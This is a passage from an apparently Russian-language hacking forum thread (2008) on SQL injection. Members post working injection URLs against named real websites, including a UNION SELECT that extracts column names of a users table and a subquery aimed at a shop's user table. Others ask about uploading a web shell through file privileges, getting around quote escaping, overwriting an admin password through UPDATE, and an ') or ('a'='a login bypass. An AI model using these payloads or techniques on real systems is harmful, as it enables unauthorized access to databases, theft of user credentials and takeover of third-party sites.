
30.12.2008, 23:48
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
Вот так.
Код:
http://dixis.ru/actions.php?act_id=-347+union+select+1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0x494d45495f7573657273--
|
|
|

31.12.2008, 01:11
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
С нами:
9216251
Репутация:
30
|
|
Всех приветствую.
Подскажите, обязательным ли условием является не экранирование кавычек при заливе шелла при том, что file_priv = Y.
Спасибо!
|
|
|

31.12.2008, 01:18
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
Сообщение от Octave_Parango
Всех приветствую.
Подскажите, обязательным ли условием является не экранирование кавычек при заливе шелла при том, что file_priv = Y.
Спасибо!
Да, но даже при меджик квотс = он можно выкрутиться, вот смотри: https://forum.antichat.ru/showpost.p...5&postcount=39
Меня это спасало не один раз, да и имея возможность читать сорцы сайта, можно найти ещё какую-нидь уязвимость или туже "двойную скулю", но в другом скрипте.
|
|
|

31.12.2008, 01:41
|
|
Познающий
Регистрация: 18.04.2008
Сообщений: 62
С нами:
9507243
Репутация:
37
|
|
По-идее при SQL-инъекции в MySQL можно использовать команду UPDATE, так? Подскажите, как тогда будет выглядеть запрос к БД? Примерно так?
http://localhost/index.php?id=-1+update+1,2,3,4,5,6+название_таблиц ы+set+password='admin'+where+id='1'--
|
|
|

31.12.2008, 01:46
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
sql надо изучать с бд, а не с sql-inj тогда не будет таких глупых вопросов 
|
|
|

31.12.2008, 01:52
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
Народ пытаюсь обновить колонку (инфу о юзере) и когда жму на EDIT
то выскакивает редактирование ПУСТЫХ полей! в чем дело??? Прова на запись есть! (раньше редактировал)
|
|
|

31.12.2008, 02:13
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
>update table set a='1',b='2'... where user=1
its maybe successed/access denied
|
|
|

31.12.2008, 02:30
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
Вот еще
У меня иногда выскакивает табли4ка в шелле
"Owned by root"
что это?
|
|
|

31.12.2008, 13:00
|
|
Участник форума
Регистрация: 21.10.2006
Сообщений: 171
С нами:
10291924
Репутация:
413
|
|
С наступающим, думаю то, что я хочу спросить уже обсуждалось кучу раз и видимо поэтому я не знаю по каком тексту ее искать.
Вот пример из квеста m4g'a - http://m4g.ru/quest/lvlvlvl2.php?lang=ru
да, чтобы зайти на второй уровень нужно вот тут http://m4g.ru/quest/lvl1.php в поле пароля что-нибудь вроде ') or ('a'='a ввести.
Так вот значит http://m4g.ru/quest/lvlvlvl2.php?lang=ru
К любому файлу дописывается .php - вопрос - что делать?
|
|
|

01.01.2009, 00:38
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами:
9147012
Репутация:
9
|
|
Никак не въеду, нашел все таблицы, но при вводе:
Код:
http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+name+from+shopusers)
выдает:
ошибка '80020009'
/reviews/default.asp, line 41
Помогите плз!!!!
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|